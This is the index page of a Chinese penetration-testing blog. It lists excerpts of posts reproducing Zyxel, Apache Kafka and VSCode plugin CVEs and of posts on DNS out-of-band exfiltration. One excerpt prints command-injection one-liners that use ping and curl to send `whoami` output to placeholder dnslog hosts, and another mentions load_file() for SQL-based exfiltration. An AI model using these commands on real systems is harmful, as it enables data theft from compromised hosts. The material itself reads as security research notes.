savior's blog
  • 首页
  • 归档
  • 分类
  • 关于

Zyxel防火墙远程命令注入漏洞

12CVE-2022-30525title="USG FLEX 100" 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808
2024-12-25
漏洞挖掘与复现 > 网络设备

ApacheKafkaJNDI注入漏洞

12CVE-2023-25194 搭建漏洞环境放在阿里云盘 12345bin\windows\zookeeper-server-start.bat config\zookeeper.propertiesbin\windows\kafka-server-start.bat config\server.propertiesbin\windows\connect-standalone.bat conf
2024-12-25
漏洞挖掘与复现 > Apache系列 > ApacheKafka

Vscode命令执行

12345CVE-2022-45025漏洞是由于Markdown Preview Enhanced for VSCode插件没有对pdfFilePath参数的输入内容进行控制,因此我们传入恶意命令,参数拼接起来加上开启了 { shell: true },从而导致了命令执行漏洞的产生。(https://github.com/shd101wyy/mume/blob/7135d760
2024-12-25
漏洞挖掘与复现 > 操作系统

DNS外带数据之SQL注入

注意点 dns 查询有长度限制,所以当查询结果数据过长时需要截断 特殊符号,如@,一般先编码后再带出 mysql条件: Windows mysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv 适用于联合注入或堆叠注入具体: 12345利用 mysql (Windows 适用)中的 load_file() 函数select loa
2024-12-24
渗透测试 > 漏洞姿势 > DNS外带数据

DNS外带数据之命令执行

Linux12345678910111213141516#pingping `whoami`.xxx.ceye.ioping -c 1 $(whoami).xxx.dnslog.cn#ping+base64ping -c 1 $(whoami|base64).xxx.dnslog.cn#curlcurl http://xxx.ceye.io/`whoami`curl http://xx.xx.xx
2024-12-24
渗透测试 > 漏洞姿势 > DNS外带数据
12

搜索

Hexo Fluid
总访问量 次 总访客数 人